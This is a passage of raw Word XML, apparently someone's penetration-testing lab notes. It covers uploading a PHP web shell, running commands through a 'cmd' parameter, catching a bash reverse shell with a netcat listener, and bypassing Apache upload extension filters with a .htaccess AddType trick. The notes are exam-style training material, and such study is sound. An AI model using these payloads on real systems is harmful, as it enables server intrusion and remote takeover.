    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000108A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that works, then we can try to upload a web shell that will allow code execution. We want the following payload: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php echo system($_REQUEST['cmd']);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000108B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, since we can't use echo due to the '' around cmd, we will have to manually create a file called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">webshell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and then nano and add the payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000108C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is an example of how to create a webshell. We can also get a webshell by searching "Webshell github" or something specific like "PHP webshell"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000108D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now, upload webshell.php, and access the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000108E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When you click on the file, you should see something like this in the URL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000108F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="683"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://10.129.235.51/_uploaded/webshell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001090">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="683"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It looks like nothing is happening, so then we edit the URL to run any code we want</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the url, we add the "cmd" parameter, and then the value is the code we want. For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001092">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">http://10.129.235.51/_uploaded/webshell.php?cmd=id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001093">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The page should display the output of the id command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001094">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can then send a request to Burpsuite repeater to try different commands. If we have a GET request right now, use repeater to change it to a POST request. Right-click inside the Request body box, and click on the "Change request method" in order to convert this HTTP GET request to an HTTP POST request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001095">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Set up a necat listener: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rlwrap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> nc -lvnp 4444</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001096">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the repeater tab, we can alter the request and set the following reverse shell payload as a value for the cmd parameter. This reverse shell payload will make the remote host connect back to us with an interactive bash shell on the specified port that we are listening on.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001097">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="169"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/YOUR_IP_ADDRESS/LISTENING_PORT 0&gt;&amp;1'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001098">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001099">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010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9B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_tssmu0tedue2" w:id="134"/>
      <w:bookmarkEnd w:id="134"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to bypass extension restrictions for file upload (including rev shell) on Apache by using .htaccess</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000109C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000109D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId331">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Access</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice, we tried uploading a .php shell, but it said we can't upload anything in .php format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000109E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000109F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">John Hammond has a</w:t>
      </w:r>
      <w:hyperlink r:id="rId332">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId333">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">video</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to explain it well</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From here, we uploaded a php shell but we just faked the extension like </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">shell.xx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">x</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">which sometimes works </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">since the computer often </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ignores </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">the extension and recognizes the php code so it can run the PHP shell fine. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But THIS time, it actually looks at the extension. We know since it prints out the shell code when we try accessing the php shell on the website, instead of running it. This is because it doesn't recognize the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> .xxx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> extension</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, to make the computer recognize this extension, we can use the .htaccess file on Apache to basically tell Apache to treat any file ending in .xxx as PHP code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo "AddType application/x-httpd-php .xxx" &gt; .htaccess</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">AddType</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010A9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache directive that tells the server: "treat files with this extension as this MIME type."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">application/x-httpd-php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010AB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the MIME type Apache associates with PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010AC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">When Apache sees this, it knows: "hand this file off to the PHP interpreter."</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010AD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.xxx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010AE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is the file extension we are mapping.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010AF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="51"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Meaning: any file ending in .xxx will now be processed as PHP code.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010B0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Upload the .htaccess file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010B1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The ".htaccess" file wasn't shown in the "/uploads" directory because it is a hidden file. But after uploading it, I could see the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">web shell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> we uploaded just now had been </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rendered </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">when we tried accessing it. The server now renders the ".xxx" extension as PHP. And it allowed me to perform command execution.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000010B2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="357"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
